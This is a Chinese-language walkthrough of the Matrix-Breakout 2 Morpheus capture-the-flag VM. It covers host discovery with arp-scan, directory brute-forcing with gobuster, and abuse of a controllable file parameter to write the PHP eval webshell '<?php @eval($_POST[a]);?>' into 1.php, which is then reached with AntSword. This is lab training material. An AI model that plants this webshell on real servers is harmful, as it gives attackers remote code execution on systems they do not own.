当前位置: 首页 > news >正文

matrix-breakout-2-morpheus

将这一关的镜像导入虚拟机,出现以下页面表示导入成功

以root身份打开kali终端,输入以下命令,查看靶机ip

arp-scan -l

根据得到的靶机ip,浏览器访问进入环境

我们从当前页面没有得到有用的信息,尝试扫描后台

发现有一个后台目录文件robots.txt,尝试访问

没有得到有用的信息,尝试端口扫描

分别访问这几个端口,也没有什么发现,我们换个思路

还是将重点放回80端口,因为robot.txt提示我们继续找找,可能是因为我们的字典太小了,我们换个扫描器换个字典试下,利用kali自带的最大的一个字典

cd /usr/share/wordlists/dirbuster/
ls -al

gobuster dir -u http://192.168.164.147/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

提示没有安装gobuster(颜色没变)

先更新apt,再安装gobuster

apt update  

apt install gobuster

运行gobuster查看是否安装成功

再次执行上面的那条命令

尝试后缀名拼接到ip后面访问

在输入框中随便输入,发现输入的数据被显示到页面上,抓包

发现网站会将提交的内容追加到graffiti.txt文件中,由于file参数是可控的,那么我们可以修改文件名改变文件上传的路径,尝试上传一句话木马到1.php中

<?php @eval($_POST[a]);?>

浏览器访问1.php

蚁剑连接

测试连接成功,添加,成功获取权限

http://www.lryc.cn/news/510925.html

相关文章:

  • 农历节日倒计时:基于Python的公历与农历日期转换及节日查询小程序
  • 【RabbitMQ的死信队列】
  • 掌握软件工程基础:知识点全面解析【chap02】
  • 公路边坡安全监测中智能化+定制化+全面守护的应用方案
  • 闲谭Scala(3)--使用IDEA开发Scala
  • Go语言反射从入门到进阶
  • 【基于rust-wasm的前端页面转pdf组件和示例】
  • ARM64 Windows 10 IoT工控主板运行x86程序效率测试
  • 开放世界目标检测 Grounding DINO
  • easegen将教材批量生成可控ppt课件方案设计
  • 2002 - Can‘t connect to server on ‘192.168.1.XX‘ (36)
  • 【虚拟机网络拓扑记录】
  • 【单片机通讯协议】—— 常用的UART/I2C/SPI等通讯协议的基本原理与时序分析
  • Vue3 核心语法
  • LLaMA-Factory GLM4-9B-CHAT LoRA 指令微调实战
  • GTM023 W.H.Greub线性代数经典教材:Linear Algebra
  • 交换机与路由器的区别
  • springboot502基于WEB的牙科诊所管理系统(论文+源码)_kaic
  • soular使用教程
  • 纯div+css+js弹出窗
  • 一篇文章学会HTML
  • QGIS二次开发(插件开发)
  • Web防火墙和下一代防火墙的区别
  • Linux:alias别名永久有效
  • 【递归与回溯深度解析:经典题解精讲(中篇)】—— LeetCode
  • 01.HTTPS的实现原理-HTTPS的概念
  • 一文详解MacOS+CLion——构建libtorch机器学习开发环境
  • 【LeetCode 面试经典150题】详细题解之哈希表篇
  • linux socket编程之udp_dict_serve服务端--引入配置文件
  • selenium学习笔记(二)